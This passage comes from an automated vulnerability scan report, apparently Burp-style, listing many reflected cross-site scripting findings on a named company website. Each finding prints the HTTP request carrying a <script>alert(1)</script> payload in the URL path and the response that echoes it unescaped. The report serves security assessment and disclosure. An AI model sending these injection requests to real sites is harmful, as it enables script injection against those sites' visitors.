User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsd06f8<script>alert(1)</script>187267bc4e3/jquery.imgpreload.min.js?1305348156</h2>
...[SNIP]...

1.97. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.imgpreload.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23020<script>alert(1)</script>65c996967f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.imgpreload.min.js23020<script>alert(1)</script>65c996967f7?1305348156 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery.imgpreload.min.js23020<script>alert(1)</script>65c996967f7?1305348156</h2>
...[SNIP]...

1.98. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.imgpreload.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51a69"><script>alert(1)</script>0d8c5315efb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.imgpreload.min.js51a69"><script>alert(1)</script>0d8c5315efb?1305348156 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery.imgpreload.min.js51a69"><script>alert(1)</script>0d8c5315efb?1305348156" />
...[SNIP]...

1.99. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.livequery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25d4e"><script>alert(1)</script>ba05c9fe7c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js25d4e"><script>alert(1)</script>ba05c9fe7c8/jquery.livequery.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js25d4e"><script>alert(1)</script>ba05c9fe7c8/jquery.livequery.js?1265536927" />
...[SNIP]...

1.100. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.livequery.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 618ef<script>alert(1)</script>21a34de43f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js618ef<script>alert(1)</script>21a34de43f5/jquery.livequery.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js618ef<script>alert(1)</script>21a34de43f5/jquery.livequery.js?1265536927</h2>
...[SNIP]...

1.101. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.livequery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cad07"><script>alert(1)</script>6ede187ab0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.livequery.jscad07"><script>alert(1)</script>6ede187ab0a?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:31 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery.livequery.jscad07"><script>alert(1)</script>6ede187ab0a?1265536927" />
...[SNIP]...

1.102. http://www.sourcebits.com/js/jquery.livequery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.livequery.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 905ba<script>alert(1)</script>3f55e04fe11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.livequery.js905ba<script>alert(1)</script>3f55e04fe11?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery.livequery.js905ba<script>alert(1)</script>3f55e04fe11?1265536927</h2>
...[SNIP]...

1.103. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery1.6.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 215b7<script>alert(1)</script>322b7e3b7ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js215b7<script>alert(1)</script>322b7e3b7ea/jquery1.6.js?1305629942 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js215b7<script>alert(1)</script>322b7e3b7ea/jquery1.6.js?1305629942</h2>
...[SNIP]...

1.104. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery1.6.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e8f"><script>alert(1)</script>a29490a2495 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js90e8f"><script>alert(1)</script>a29490a2495/jquery1.6.js?1305629942 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js90e8f"><script>alert(1)</script>a29490a2495/jquery1.6.js?1305629942" />
...[SNIP]...

1.105. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery1.6.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3103"><script>alert(1)</script>f5caea96825 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery1.6.jsf3103"><script>alert(1)</script>f5caea96825?1305629942 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery1.6.jsf3103"><script>alert(1)</script>f5caea96825?1305629942" />
...[SNIP]...

1.106. http://www.sourcebits.com/js/jquery1.6.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery1.6.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 215dc<script>alert(1)</script>95af8fd7b4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery1.6.js215dc<script>alert(1)</script>95af8fd7b4f?1305629942 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery1.6.js215dc<script>alert(1)</script>95af8fd7b4f?1305629942</h2>
...[SNIP]...

1.107. http://www.sourcebits.com/js/main.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68dee<script>alert(1)</script>55daecef101 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js68dee<script>alert(1)</script>55daecef101/main.js?1297925994 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:49 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js68dee<script>alert(1)</script>55daecef101/main.js?1297925994</h2>
...[SNIP]...

1.108. http://www.sourcebits.com/js/main.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a93f7"><script>alert(1)</script>378708f50e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsa93f7"><script>alert(1)</script>378708f50e9/main.js?1297925994 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:46 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jsa93f7"><script>alert(1)</script>378708f50e9/main.js?1297925994" />
...[SNIP]...

1.109. http://www.sourcebits.com/js/main.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f11b<script>alert(1)</script>0118837862c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/main.js8f11b<script>alert(1)</script>0118837862c?1297925994 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:49:05 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/main.js8f11b<script>alert(1)</script>0118837862c?1297925994</h2>
...[SNIP]...

1.110. http://www.sourcebits.com/js/main.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c9b"><script>alert(1)</script>a5351d0cd79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/main.js74c9b"><script>alert(1)</script>a5351d0cd79?1297925994 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:58 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/main.js74c9b"><script>alert(1)</script>a5351d0cd79?1297925994" />
...[SNIP]...

1.111. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/modernizr-1.7.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5af8<script>alert(1)</script>acf6a23c6f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsa5af8<script>alert(1)</script>acf6a23c6f1/modernizr-1.7.min.js?1305313043 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsa5af8<script>alert(1)</script>acf6a23c6f1/modernizr-1.7.min.js?1305313043</h2>
...[SNIP]...

1.112. http://www.sourcebits.com/js/modernizr-1.7.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/modernizr-1.7.min.js

